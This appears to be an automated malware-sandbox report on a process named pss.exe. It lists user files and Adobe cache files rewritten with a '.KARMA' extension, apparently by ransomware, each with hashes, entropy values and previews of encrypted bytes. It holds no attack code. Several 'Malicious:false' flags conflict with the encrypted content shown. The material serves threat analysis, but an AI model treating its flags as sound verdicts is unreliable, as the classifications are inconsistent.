.d.b/x-..]...>1.p..@...<(.G.E-.P.C=#...%.`..i...HY..T..g?..Z.a./..S.0.J...................._...|.~I.....s0%...n..A..6l....@q.....'..s,...h......j.........N..p?..iQ+..l.-..wp..i.....-..{..DaF.K`...?2.GQ.,.Y.>zL......u:+4......./.{.w..z._R........-i$.%....d..\.r?.6.....-.$!.}.9Bd...c0.T2%..1.p}.#..W.N.V....g6Qh.(.<iR'"s...f.....Uq<..O.(.bD...GE.$.\..yl.]V.Y......'[n(Q..<....Kh.._|o....c....q..O%.7F...)...B*.g..M...|..Q../..l.......bBX.s.....-...?.&...-#25.<.^....0......%.x6'..G......3....{W'E.4]....DTB.;...O...2+..]I..H.(>.@..+t|[..1..KH4&....+&.......s...x....gr8...M...k.
C:\Documents and Settings\user\Downloads\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.823312150124047
Encrypted:false
SSDEEP:24:dBwOgv4J9eboIqV9j19c7lD03p+Ddl5TyVOFQDrAQqZjzijkGO4lb:HwOQenj1GlD0Z+X5TyVOFQDrXCa3O4J
MD5:A332AAFA835AB972B577AF88E80620E6
SHA1:0ADC96942ED6F66981B9976D69E9064A71946C97
SHA-256:17788D77E9DDF79DE5BE84BAE00154521394BC8DF9383D1072093BC494524750
SHA-512:C9DFA0736B0EF07D8FA8883E4237992CCDC19EF5DB55D21BB680C04F153205E176B5E99F87DFBBA663EAF99D808142454ACB29D46F6AD242141C3F4593907B15
Malicious:false
Preview: 3.gG..7O......(/...4{)..$..d.....,.....P...Q.6.....24.....G....KARMA.....A.2..r.g.I..`L.. .(t.U._....L.5.@..=....d9........;9r....Q....g.......)Q..D.iznU.<D..VgdFl.D.@....sm5T.|.o......Mi..U..F.;....qv;<$sl01.gF3:.vl.~bl$.3(......FM.J...].d..0'....M......a..5..YR>.w..i..5.Y..3.=.*.......gU.^.PQ.<..K.'......-.f.+h......L.9.Mn.X..3x.F...fcB.0..:6,0.....C.W....=..P..s....CG.:q7......c&m.A..?g./.....6TP.%uO....~D.L.j....G<.D4..r...K.......Qx[.u...9....E...q..4x.$/....H..WU.Z..4..x....t$">.X.'.]~...e*..DE..j..}(.x.?.%Ri.>..y...N...y./i..^y2xB..0..,...l...3p..N.t.5..dg.....6..8_..9...q.J.O....6.D.y.R+..W.d..?9......]..&k.Skx...'&=.5.......Z`.....tn.z...x..xp..8v..-..+LuaG\.v...(...h...S.VK.UA.^=.(. ...#..3L..n>.h.."}...t5*)~.p.:.-..kT..;?.....7o.m......I.R.Xj....l.......'..=.O.e..Zi|.|E...D..)...../i9.[.|...!;.R[d./#d..o.,H.......f/eiZBX.RL.......]G..*.Sz>..go.)J...."J......ncg..>...\.Z.W..m..|.. ..u.+.u^R......(..GO...R....N..;.G.1.9/2...R.....:.-z
C:\Documents and Settings\user\Downloads\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.818448776663923
Encrypted:false
SSDEEP:24:55HZnV/5zDCvl/L6bHP5Npdd9vViZHVLMDi7xNh3PFwONnCk9RoEQo:555HaFL6bHP5NpVu1MoxNxF58o
MD5:BE5F06A51A2601F1D3477FAC6185815D
SHA1:00EAE340570F09B513439AC811F2E3AD52B7F2E0
SHA-256:944986A226F5B3081A7DD5D7B3583935ABB27B853E23085627B6CAC605D1B782
SHA-512:4B0755A4BC2FED0D6ABB17158F55205034B86C4914BE38BD2CDE111D5A38FF8FAE2617D962B0834EF876F35E5AFABB1F2D8F5566C2FDFCE715DF3BA9EDDE9368
Malicious:false
Preview: .;U.........OkE8..j.....K........g.9TvS...!e%.....=.... .K....KARMAW?d..^.Wp....;..L(......jN..?...72...5....f.".......[.@.+.....q........&&..!.,7..... ...."968.+....7..I.....R..dn..X"..h...>....H2...#. k~.....E..%...~..0.z:.w..../v...N..r.$"..J.C..%....7.(.Cw.a".....+.Wt<.a..Q..~.-g.)..k.AP..y..c&\P.&...s...q.`.".........j......A%..N...0TN..v..d./!.M..Z<-W.:....8.......Y...`R.i..%.....bTE....2r...<c..\w....lP...;.Y>.++!..!.`.N..*;......([..L..c.........bq....)T6<l.hq...'V.!QQ^.,.L..v...6..X.q:.2.h$...w..C...-k.4.......@..F..2..'XQ...y.^5.......".x..Q..(!S.....cj......d.A.A...x.....lJ.;.....,R..=.f..i.r`...Yq..|~n.xy.....<....h.+.x.?N...W1...>.$.F...BH..Oe.=..O.v....W.A.....m.Odq...........~..Ub.zD....m...pE[.f...p........`.c..M!..Y..:O..i.s..g....hl.q..q.m...D.rct.....W...,.J*......;S......`/. x....*.oh...RU^..;8v..<h....|3O..r<..+.,....>..|U.d.x}...X....X........7Wk.V.rui.......7.....$....I.....N..Z.p05.2...>...[..A.>1);....1|2'.WSd.He
C:\Documents and Settings\user\Downloads\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.841143929859832
Encrypted:false
SSDEEP:24:aGSkg5iVPLAHfpIiOUhziETRn8u8c37ARqPR+HGeZMpFBZ2F9:a3OA/JOUhD5PAu+HGeqpnIF9
MD5:D46A6E9F9F7FA409B6C4DA4B03496D3A
SHA1:E4F3A65805A7FA5BD9659F7086230C11399BCF61
SHA-256:7E25A9536048F1F2ABCCD67113164379295A36522A299921BDF2690B38C32F17
SHA-512:5A7EEEB6F729C64848130B760B7A7AF8F49AD137E287F9DA94372CE2E510973136756D97C3A78F8A3044056515D4EC1262B6FAC391A34C6D4DBDD6EA5FA15E5B
Malicious:false
Preview: ...9...D...;.....La..~.\J/....D..#X..+....).5I.c.j!......F...KARMA^.....uV...[M.1.m.0.H1..P.."..B.1....RRo..q.2{.3$..vU[...= .Df..!....K9....#J.y...../.cC.Z..$i.........`.LO..l..b.c.rN.Y....8.k.!....Yjn..98R..>J...f..k.QU...".=NX/....".bl0@...DdZ0.[ie..v.G....N....6.l....W..S}.(..8../.-.S...R.........q...........g.X..?.q..&.3...!..!Q ..l+...~v..<....4%....2z.:0 sj-."....R.g..f.6P..m!.Oh)..@3.&H@thqE..A=C.d..Ab.(..*Ot......x..?i...c...Q...0.p....O.&.....P=.@.g.a..d....g...Gg....,..7....0.0H.P..0}...A..d%Y..7.9..G....*..vy.*.1n..B...........@. ......8Fo...1@.Ao`.).~...YQd..j.._.T.i.... ....e..........p.Cdn..}....<9.'.<...y..b.a....b@+1..kZQ...>.T..c..Z[...ubT.c0.;^x...Q...44.....WQ./.O.....2{nEe}..,.n..1..........k*.:..~.R.`..|X...]f..X.ME.b........Y.....2..z......QP&...s.....}.mr..|vx...huQ.=............y....2.m..[.....j.$...#.U..!.f....;..D......LY.../Z.....o.E..P.o@gB.9^...*...@....^n.ok..L.[.IfS.8.....3.(});..O.....$H.....2^2.P.2C..2A.?
C:\Documents and Settings\user\Downloads\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.816065564803297
Encrypted:false
SSDEEP:24:f6J79gXrOc0bhIkKR8VJhUBtv7vuGP/XfpA5aT8nK9CxyKtNZpLKR:fGgbOs4Qtv77P/fpEaTj+Nt1E
MD5:781365153DF3C3016458644F53D3FC60
SHA1:45DDE3D366F2F6E074E857A34BF16B65FF989D8E
SHA-256:07433B072CEFC7E8BAF7DE4A02097879A8DA21EDC06AD5D1D1B253E7B7F04425
SHA-512:D08AED813271F1C9AC3E3B50A8FA57F5E5D784BDD6386CD149A6A89A466CF61EF447D159CF2815308E8FEA09F50D962D6477CC3D1969AC8B417884DBBB1B8C15
Malicious:false
Preview: QT.qA+.7Pk0...o...&^z..^.W{.X.....:.&....g...S.:_..i...........KARMA.........~....{..".Ez.....[k.@[*....F_...h..<U.A.&.[..Pa.. .`......l..gr2.......Zg...W..X.].......!....[N..l/..tC......0.B).Y.J.P.@`9m.#?.e'.Oi./.q.=d..7...l.lH....q ..h.@..E...@uY..H0Kk[..5ms..W..=e!....sb.....R~.].Uo......."Fk.y$... #.l.>...HC...p..A..XHx7J5.00..r..".+....>n.r....ma.S?..}6y:"~.zk|G.....}..^.P...Q....[.........V..)L..W....u|6......\N...P...D6...# ..}K &./S............~.....U.*4._B.-m.$!!(.2.0..p.T..az.p..H..j..0C...x..I~....zz..'.{.O.^...q....o5.t..#/ D..g..d.6_.v...X.%3%y.@..Z.h$E".:7I._..b.=...7w......sQ....4G,....>...G._...!.d.H....n#g..1...p.}e...r.....{.z..S....a.p~..V..P...zh.e..B..|6i.q.......+.kX..XF.p%.......;P...Y1..L*....>..1.M.d:..l......#.C$...\.)sVMgB.?..._.F.....D.5F...i..r.......Z:K.yv..=....[.i.\...1.2...fV..<..g6.ij/H..ql.v.a.............xf3B>~.i..Pk....|:..4.p..c.j..p......P.u34...v.R..'/(N.*..48bWf.`...T+.w..9./.....jB0.I.>:#
C:\Documents and Settings\user\Downloads\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.810397506908055
Encrypted:false
SSDEEP:24:uwty4xyCtvc6GOnbdjvhbkj4jvLZp7WnS3pk+hEHaFdAtx:TXxyYvcSbdjvh4j4jvg8pdhEHaFdAtx
MD5:D3E065E36B769B39F7373F6C2BEA1F58
SHA1:86248099E8E14C0512C35B7301B8B56D8F09F9BA
SHA-256:1A23EB9B8422ED0337E6148447A9FD24E6B4F4FA14DA1206E6214F0AEA009844
SHA-512:3D32D6372F8D63705A15FED33BAE85B0D40A8F84AE1526B6A7B513A0AC56A3F6A3B5B87786ECCB556B2196F21CF6567433C502170B7A8EAEDE51146372414487
Malicious:false
Preview: .r.7.............S>/..X4...6......5k..qi..;h(.p.W...X..-......KARMA.g.T..MRU>pH~1^.....f..&4..O..+.`&..........,...z.U....r....h...QHMC..-i}2....w.RG.kK.Z.n1n..z..7..4.M....l......fq.1(3R.N.k.Pn..5..Mr..rIS"D...6..E.77.5].q\.wr."].?3..C..5kz_..6....#iz..X.l.(.zd#..D...v+Q.n.C..l.......Y..=s...W.....m...>.n [."N.[.`..^.....\.S(d..M...+q...:[......<......lR..........n.w..^.:>.....Z.hs...J....r/y.c .).a.5..nl.H@...8..p..7.R.vE.T.M...3.X.T...5...'e.O.h.1...2-..uL....5..Oz..{...$CtM......,\.Z..YZ......@JGZ1..nc....,.....2..hKG..X..\..n......1..S&.LpR.krZ..x?..n..Drngv...cV..M/.m..(.4........p.Y.|."bUe..o...c.S.+.}s.V.. .......h........+o..x@y.\..%B.r.F:...N.......V....?C}.. .......W..:[...X.....?..Ut.N,m.gC...L......y{..zr8u.9..%.J...........z....g....1...Q...49.?...k..&a..,.....8h%..\.Q..+h..h.....Y..N7...dU.&..?}..3.+fh..:q...c.%.=.ez..A...g.<...9R.j.K..7r....l$.........,..h..%...t.VO^.....(.Vp..y..r....J.8V....:Mf.^.i....9.e.%O.!..E,....c.<.$.L.
C:\Documents and Settings\user\Downloads\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835493741139947
Encrypted:false
SSDEEP:24:ndV6oFMlzzTa6LozG9fmwRND/qifqhDzKMjnKh:vMlL7cXwnImyI
MD5:5540AE67DC608B71D03501EBC4D02F26
SHA1:4F8F9DB7221B0466D7679C90C9408F5413B89EB9
SHA-256:F5E0BD32FE2F8B5ED0DEDCC58E730C2DCB7F45D27AEADB379A6149793C2C9445
SHA-512:0F80A3E50E7C1B960D84CAB00D676A7B742D3C9A3758ED2288DC135697B73CDF6962B845B3E920FDE4EE5DC25069FA0E84A068AE507FBA8C70C3EAC27FBD090D
Malicious:false
Preview: K/*..EZw.Q....cO..@...7.........c4..+.Lm..S.....,.s.....Z..t...KARMA..-u...c...[....k...1..6[.u,.G2....[.Oq...m.....L..Fsg.&............W..f".w..Ih.z.G.W S..-.nO..7$Z...R Y......;...s=H.........K....]2"....>./\p:...#.A+......Dcl..uA.z..{.A...5i.tp....U..+.....}.?.D.x8.Q'.U...xH.(....6.[...QT.Ec..}|.U..\...r....2.'.G.s....."M1....b..ww.V...B...3...g..2.y....I.V..t.S.....0....^..&..o.jm3-...V?..|..fN._.m.i. ..wF&...U..-._FH.\.....a...(\]L|......J..g.........c..../..-.....6.....+.%..../T...`.<1u9[.Qb..x.....M.w..p.Z...9-...R..I__.$..]..Xe..r..91...m..0.#.g,..Dtz...%.u.X.v1.m.x.8..1..........f_*}....q.....U...i.!z!O.HM=.%..6.r_.PY.X0..#.p.H..G>.EH....s.7}pq.j&..........J.>.kg..&......MR.a...rl...5K..:^....}...&a.1.#...hy'.CS-.X..;.A....M..r-@...;..../Z...Gx.c.L`.w@ !.|l.5.!...t2.Z...h.c].l..PM.p..2.f.:.m.0.j.).C..]8.;y.[......h.....A?....l...1$._W...h....#..Z....]..Cq.[...?_........"..Y..^d.2...L..p.).6.^;.y...).._.2.V...E.........).H6....
C:\Documents and Settings\user\Downloads\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.804702290356976
Encrypted:false
SSDEEP:24:nGQNthQQdYnZsfylxrcCv75zEzFV4Jzfm86y9WFw5ObR:vNPpehd75zEJyJzfRr90w5Od
MD5:7569FAD3A9E5F3E3E7D9796CAB4E559E
SHA1:498BCBC52E4C4D3ECB0546A94AF0366905DCAC9D
SHA-256:5C51714A2E62FD53C60E1AEC743D3DD18EA26ACEDA19BA98EDAB9780EA3C6F2D
SHA-512:E698AB725C540043A0A3613AF4D7C6E7224C67FF74C62B484B2A181ED56EA2250F6A8D20ED3027B4C84DD6DC47DDD4DC8EC1D4841830A0400FB0ECD3CD846B47
Malicious:false
Preview: u.n!s^.G..h.W..T.M9.7.N.0kQ....9..F..t..q...*...%*..h6.l......KARMA.+%..$..X.t.!1.'08Rk.O.[P.+.E.%.WP7AO.......9A...7.....@R.]..QS..>.2...$..b.M.I"t....D..s_$z.."b....VZ....dq.....P..+H&V..+.j/...]}..I.Y....o~........j..7.S.q(.....A.k980:.G;QXp./".:.5..m..*.S...@;K'%^..K+.o.#......Z.)/C.o.%.K.k/.9.^u&%C.^...X.9.4jO....*.l...=.b._X$..".....kLI.t...Z..e.u.}.......a./V.J.....!.t.W..^US;...SB2\..Iu$b9vT....x.z'8K..#.c......e.H0.K..}$V....9.d.\.J..9?h.K....L@K...W..&+O...x..).........?!..V..p...\......t.........i.`.t.t.\....8..<#.........B.$j..).(e.z.\%A.V.......{yZ......%.a..*2.F..B.}....Ap ..?...d/....@.E'h2{._......>..(.p..z......!v...1R.S.WJ/)C....1bX.u!....'\..+..?.g.....'.rR..P..[.b..6....k?W.l.jHh...r....6...".).e.C*..-..z.o c.sP..`gp.QX8_...)...j..K...~2....|U@7.9k{[...>. .L.......K...H..rx...s+/.X..{W.......W..(..w.?.r..<O..A{..o......)saJ.m/.QS...T.p)...].a./.%E.....p.o......"..-r..}.V.7v....3*@)U...$|R...p....[a..`n.
C:\Documents and Settings\user\Downloads\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819881850037968
Encrypted:false
SSDEEP:24:JenOriYL4UOgUECt/IYVtzkBSe79vUXYmQ4JiutHHzCYIXUbwQUu9:YOnLGP/DMaYmziu1zCNXUPX9
MD5:7D5D6349078AF3D48CFB8FDFA864D762
SHA1:FD24369A2A8ED088BA7D0BF85D8975B9AE3CEE64
SHA-256:BFAF42EB7B5FB395A162C359F012C987E761029A95B8F31D495C33AE3F1D2A61
SHA-512:45A861E7A0541A53DD02494B48792DFCFEF57514AA18E4F45CF68926FD20E1D1FBE0579C3120A5D6E4573DA16C389D66B45BBFE7210281E6B1B25070D9B5C407
Malicious:false
Preview: =...(..(Eu ......;-l..;~$....._4..a.....}...u.9.~.5b..c...KARMAV....cj+.......$..a6....Y..%.....VQ......S...N.....+..c...c.9)......0...x.F..O.0sm}rp..5...U..../.Bi...EQ.=............L..?.t..,A.._..4.>#L.h.^'.r...._%...,.......~.m....5........}.../]...7".qH.L.....|..L..@..vq....'M.E.0....(...)D...F.....".i.\'..1..:V]...C..AT...q......4.v.:...W+...E..P.......!......Y.D..........g.QP...|3......S3..%....d.+.+.4...j..k..,.l.u;..s\...:...=b.......s.X.m..q....s4......5.9.yU|j.5...s..a ..o..@..]}}JS8._...^..:.:...S.6.(....*.......anv..D..KY.V..9C.=Xw. .;....3Y...0.4...C_..A..\e...Y.|7-h.=c...Yd..*..0..e....r..*........rI..-2..o........h+...[....'.....=....N..ow4...>+?...(^2.eI.....2..D..\.-c..L....j~...../..h...uT......\...#.v.@.UY5..Vz.]..*. .^e....6.L.......F+...s....?5..j.....?....c.hf.Y.p.b...=.....%..i.....&.Q.....51K0..f'P.].r..w8......&...l....&.|..l.....i.:...k..9..4.S.R..V]^.[1Z. ..]..OfW...#....j....1..y$.p.....N.z._...Ji9..._jg..x.,.e
C:\Documents and Settings\user\Downloads\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835811565860034
Encrypted:false
SSDEEP:24:V1Ls12JzawKjQFxcUR6YrQvNCS7oLGjHAxUOK4iVwvNNiX:V1LX+kxc4KNxwGjlikwVNM
MD5:ABB83A271D244C6A0FE3FA248507B939
SHA1:25E5682EDF7F498EF6DE78D93F7FDF2CB7B86C34
SHA-256:02D35019B907AD429C9261B3C77101224C341D0A639B21F1FDE61423B1F81DA1
SHA-512:2A22AD9CC67692F1599B61A3483F5466F393CFAE0A9C69B686D3A61C98ED40AF686B245D1444E5763A40E861BD00B3330EA97FB628D08EAAD492E604926E3A3A
Malicious:false
Preview: w.Q.FjV..0.!y._.4..iFD.....x.......[.n.v........V..S......N.a...KARMAk\.~p..T.!.]|..+JGS.8d.f.F_.."...Z.M..o..w^;Pj.~......$..!H\.(.!....s.:.X<8.....?X.t......@......:....V..{..9..>6k...F..[.m3p...n.t..6.Zh.$.JF/.......X.3..[.^.c+.<.1._.9V.A..E.~;E.wNhx.].F....J.j?).}.Zl.?...0.MM*...#.?.g..kO..=..nT..9...Z.y....>..}.%=..............@./4+.*V...e/..........?M...6`.#..p..4......n...B..wJ|......_...1..f s.].wi..1$d...E.v..m.}..c.{n[....B(..H...)U...~.....r.e..G.ct.w,u...s...P....Qc.........-.a....D..6..c.z.l./]...:..\...E`..8.r.74...az8..;;...4l.p@...7.J...z!9J.O....s.`T.Xxpo.>..BNh0..^...P.l..6......:..+....e(..m.h.(..=.o.Wk.4@.M..gA....#...2.b....e.....".."...cP~.O:.....kT.:H......`l^@J....s=....o.(..........k.."..../.7e.-...Ok.....;.}.4..o.g....+.0.....(.......9G..S.P...+`.-.0?.<j.04..G.[..o5..>....j.h..@..L5Q_[.X0.l..u.&.oJ...JF.s>.4.90[.mID..Y`.d.uU@...0.Ou...=.$0aqa....7y.}#*..x9..z.$..O.2.'d.W..?.g......t..L...../..s#....I...u...}.g%.i.i.....
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1104
Entropy (8bit):7.833501918420277
Encrypted:false
SSDEEP:24:TIVDAVPXXz0DnX99S2p/uTleXProN6wxEsfyD+Siri:TMIXXz0DX9bTXTCjtt1u
MD5:C075CBC6CD0DB76D0E54A50AAA7AD48E
SHA1:738FAD3E004732B245AAE9D5012E454BE9D59495
SHA-256:EB2E3A41F08BB097CF37F783D909C48DAE10E1307C5D6AB945E24B4FC3D3C26E
SHA-512:722390BE612354C468DB45A4E269A4C52FB7E2FC7ECD6535D5DF3ED4362615D14845EE851057CBA828D9CECA2BAC132A59AA7C373745F9992572631A59BCE470
Malicious:false
Preview: .5A1.......m.......e.2..........T=z.q...sG.:.=9.8.u.#...K9...KARMA@X.......R....&0....`..i.,e.....Z.G.......W.K|(....pB.'/...q....Z..h......(..-..<.1].$R.W......(b..$M..>.z..IO....#W.w.p...Y..i...:.P.C,.L..t.B.4.Y...n...Q.z....|..`..-..d.8.o./..3`l...U..M5CiB.{.X.w..)|..gX..w.p..a.f:....L...e.h.8......![.l../..nQ..R.?..g?G..._..r.#..-.-l...........<c.`.N.6.....h.8..A..Ne.....v..~.......:!.,...X........V.K.OG....^.W9......;SO.....%&.-j..w....\...0.0.....a......&\..&r...p|....&..s..".?+....P.O..kg...f.!_..K9.a.,^Cr.%...j..pN.J^$\...y.K)..K.e...i.X.%'...w4!.`..NN(.."...S.......!...n2....O... |p/1.BE9..:x.Q.2..+..^c/..F..^...c.....N.....N.........%=..[.`.a4..%.UK..n...z..=.!g(.O...B....s.:........k...j...t.*?.j)u......%.o..X.A..z....6.....U.p.."..2..X^.+..D......'&wO...6.7gd..D.k...s|..Y..1..g.m.dH... ..3x`)N*..kJ:...........C..H.....A..3".A...% .ta.J.;..z.b9...jA./.a3`.../.D+'.l..dk.....e2....O6ny.w.E..G....x.Qmz.X+......}..s...^......$V...)7.
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):157512
Entropy (8bit):7.998769086932829
Encrypted:true
SSDEEP:3072:VYbYGZFS+qnsQJceqsrL3vSBW9SGE9SQDWbvCwkTdXQ+9Yb1497oeW:UYC47Jf1OB4P16RxXz6JqoeW
MD5:9D0136E2E308B459CB942A489D9392E8
SHA1:63A030EF9EA19CF9163EB21EC024D401982E5082
SHA-256:9F9FFE46679B2F0EA9C9CAD878166A7F7F39AD8EA8AF4FAE5DA0F9FBA5335AA9
SHA-512:614DC08EACDA0BA4408B89630E9A6AED1A692AB23E801A5CDF83C935FF777A20DBD5CEE03EC8BB3E765A137B1D5AF4AEBDF4785325CAFEE76E225913FA42F5BF
Malicious:true
Preview: +...Z.....G..5.S.(.L..a.......\.WvE@.x..&......%..oHh\R.6...KARMA.........x......h....M.}.`S.cR........iB.[.:) .TsXD..e.O..rC.*.g.....nw...:..y....R.x............F......._..Qr. Y.BEc.:....U...8..d|9......i...owy.y.`f.......^.. ." .g.o[...%?..-vh{.9.......m.JId4........"..W...+..g...R...+B`R..h.-.f.=..3..G...F..o...MeFK&Z.j;....)..'..Q+...7].)....+..<.G'..)<.Q@\.;.U.<a..-.P...r...pV1...as..O;.'.?.}O.L(.+.fp../.k.|2..0.......h...Gghc.b..<.V.YP.&.HX.._.T.v8.g...-...#...a.......jm....uu...a.l...h....f...#0....EN7....rt..a_CF.,..R.X..#<....eW{...*..(..G........X.J....(..#.Y..........I.1b..}.."/._f..V..&.Cz>...L8X.y.mwU....!..0..<+.;;...Y.Q..~W.<..|._.....9.u.......%..........]..&X`.W....f..f..8...vzr.v7....~f]K@e>........N........J.n.)\.&j.xA.....H....U.x.(.b.2..SFQW.|7.Wx..<...r(WX..M`....0.n...Sp.....2.1.t.h... ...C.b-V[A..&...%...)....`SU.I.z..s..1Z.)..l{[|^.....W...-.lzjm."Z[.p.......Y..4d...........:z4.j....8.g.........3.
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):9635
Entropy (8bit):7.984063932308583
Encrypted:false
SSDEEP:192:dRV5fpfyYzk3YeykePTpkHmhbndqvyihLhUIs954TN68XvAJa59vy8:dn5cYzp7pKGbnd+hLoexX/
MD5:397745A92FF84000407BC3F2C9B56452
SHA1:AD80530BB8C6792D62DE80C59D236CDFEE1AC505
SHA-256:17A8C50ACB84800BA3DA2964614332DCCC85A8DC70B66C68C186657EEFA43E30
SHA-512:CFF6C0EE11888D54F966757387C9BD24A0609F1D1F7CC6DC18434E0AAF4327974550F0036FA62FE649EBA9DB3DF18BC0413E6FBD6316EBDB47AB179B0BAC75C9
Malicious:false
Preview: 6{..S..5TG....4...R..3-q.T....].d[n.CA+b.......B.'..r.......KARMA..!....j.M..<.......F.&._[.D..|...:.....~..X.j..xj.e...VP0F..Y....F..Ns.VT..]......i.C.."Te.P....P.m.;.3.......gt....Q.b..Jv...F.<>_*j'..*>tN6.4\V"9a.}A{hQ..U.y....,..G......5[..=.2m..ZJ&...-.0J..o}Y..G..Up......~.M.~.L{....lz.Gg.@(..w7`.r6..bJ.s*.f.%/.!...-'.>=..y.s.Y...`.~|..b=Lo[....y.qP...(.0O..GAkO.I.i.;....m.....^.......D..C 7..].G..<~I../n.=........")fh.../..vu]c.[....$.NKVx.....4.I....!q.]..Dg.|<pv....k......\.W.c...D0.a.v.\...~....m}...ZG......}.>.ja.....i.65.v...G......@.m3...0.p.A=...$....j..._...&....!.5Ps.ls.}.Z];Y...+.#)!...^..X..]5qX.?2.e..(.h. f....J.%...<..0....Q..U@.iO+.0=0..^n#....X..6%+.F.....F..J.....)O....'..Q{...?..?..8~1R.8e....N).^N).. .fr.Q...cv..(.:.3*..q7X.A..fP...0...O.Q.F.....L.w.....! ._..*6..R.9.%.}..0.Ib.1..._.G>,.Hn..yr.Y..j5Q.....p..N....A.K.oV..4...G......../....O.NU<.....T.*...$......f.g/s'br.q..dX$)....dt..0u...G.YU...m........J....'..EE.."
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Sub-key -
Category:dropped
Size (bytes):245257
Entropy (8bit):7.99918756717482
Encrypted:true
SSDEEP:6144:rCL7CI70kgVL7sYUyieBt2C/lFFw6fGQqFzev:E+IYkORKC/lsXLFw
MD5:09C721B665625F7FCAD0A39245F574EA
SHA1:2814AC28DC8EE86D7E6089DFA4B9A9E696F2C68C
SHA-256:EBDFAFDEF0A3A9588BC989C6EB25FE77938444D7A4D0648E0C718E96DEB31571
SHA-512:47A976A42B103A4A9A691C57066D33E7C6C579C798251B74278CABCF57B2C9CFFB8F8EAC9D089AAA063ADA7C08DDFD422E712DC8DEB09C3E895F3F0E33F05AC7
Malicious:true
Preview: ...m.....h......K.%.j..Y.N'0...iK....]....b..8<.w..d........KARMAS.....#...@T.x.>]]..^n/R;k...Zs...ym...0.....c-.6\_.........<.....?.>*.A....jU..+p....X..pA..u[..c.->.@..F.:.YmWqA.....+H..yS..>|u.y.y\.ED_...Z..3..>M.4.i._..2..3..A.......L.........x..F.../......~z........6..9....r..?2.9...tA...qo.Iz......^.@..@>Y&W.......P..jw.....s..D..c>.[..,O..v..V.lKVl..Q...E..C...Ty-.9I.a..k\+u.]==..z(S%..1..oK...V..K.....P..P......o~"N..Z.lDm...&S.D.B..R..2.......%n3+.I].3.r..L.Z.uj...H......IV.23?.7..%4g<.t2>...1t./_....+....+........LJ...SR...w......D...5.1.y.L#.....he.......9.6.D.jN.=4....D.*..T`;..-.,S..).y.n.].NRdM*.X....j..jD...1IN8.:.......u..O.].....]...K......{jl .{.o.*....s..&.r..@(..W..3...=.x.t..\j..r..P.....JqS.x.u0omy......H.@...S...KEU..".B.%b'.......d.Xc.r.1...r.?.Hyz..9k=.Q..7ef.a....;.....'sg&.&F.u....0........'.q....gl..?.?.#M...p..@.%Z]...Y..!l......1.H..!%.$....T...Q....... 6.?..- ...P..\.P...R...G.?.3]..1F.!.<......).. .n.
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\SharedDataEvents.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):12357
Entropy (8bit):7.985861124591946
Encrypted:false
SSDEEP:192:BnhMmmzAjR74li3+cdq3jF3T/9smDxNka74seUulWiEzS8yFn18R7vpo0Usmq:BnLmsjREliOcM3BsmDx2OXlYU0nq
MD5:67A2226F3D675963F6C4F0872FCFAEB8
SHA1:35956D1D6DA69147803AED5EBFAE5E75CCAA55C0
SHA-256:921CD359D0D81C2C9FF87AEFCD30DD4F21A96590889D2B72C9CAD283C4175001
SHA-512:22E5FCC7053DD294B2E500C42D8E3FA9DA9FA4BC385E40801E434E382AA02C2F924FD3D5E2A61F493DE539C5FED8CCEB0A46CC7DF451FDD2530101547DD5E609
Malicious:false
Preview: SY..$bU......#..........]...........y.Tlx.9M[.G..../.NhY.]y...KARMA..>b....4.5.p..7..=..d$L.C3.l....lo.G|....SF..A7..Z-._s.D./[:^.....p.?.R.up......O..5QS.W......C......\..AV...V_.u<7..(G.0.-.d}.8FPkf......G..k..X..y...)..S&..@8...E..|o..d..yA.(O...H........TR..2....h..(...~KF!'....%..T73....a.[`C..n-@..o..u....$~X.2.w..K....W.L..5.v..0...S..,t..uh........nO`....iY.........c...f|....A....%..-.u........)c.!./wnH.L;b,...S....MO.x.3..%..N..>.....T.7...H..n.^q..>.JF.G...Uc.*...,...r=..i.KR....7(..(.Y...}....;.D..aM....#<{..u#.QTY.........R...P.1..0...g.LA#.@G8Rd3..rj...].X..e"..8.....>..z2..q.n.....7.<h.....tc.{...9..K.z3@..2f<=k.,..\.Q..........dt..&.x..;........ji...o?...H.Jmq......V.z.R........3..%....Th.;..`. ......v.,?NgQ..I....A...p.<.....P2Rs.|......i..+.$....?...f1XD<..sa.6.L....8.S......A..P.Y_..... i,e....<...X2;...!..+. 